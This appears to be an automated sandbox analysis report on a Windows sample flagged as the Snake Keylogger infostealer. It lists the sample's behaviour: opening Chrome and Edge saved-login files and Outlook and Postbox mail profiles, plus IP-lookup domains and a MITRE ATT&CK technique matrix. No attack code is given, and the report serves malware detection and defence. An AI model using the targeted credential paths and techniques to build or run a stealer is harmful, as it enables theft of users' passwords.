Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Queries volume information: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4701852091.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4701100037.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4701100037.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4701852091.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4701100037.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4701852091.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7636, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7636, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4701852091.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4701100037.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4701100037.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4701852091.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4701100037.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4701852091.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7636, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
hesaphareketi-01.exe	39%	ReversingLabs	Win32.Trojan.Strictor
hesaphareketi-01.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	39%	ReversingLabs	Win32.Trojan.Strictor

Source	Detection	Scanner	Label	Link
http://go.h	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
reallyfreegeoip.org	188.114.96.3	true	false	high
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
241.42.69.40.in-addr.arpa	unknown	unknown	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/173.254.250.80	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org	MSBuild.exe, 00000009.00000002.4701100037.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp	false		high
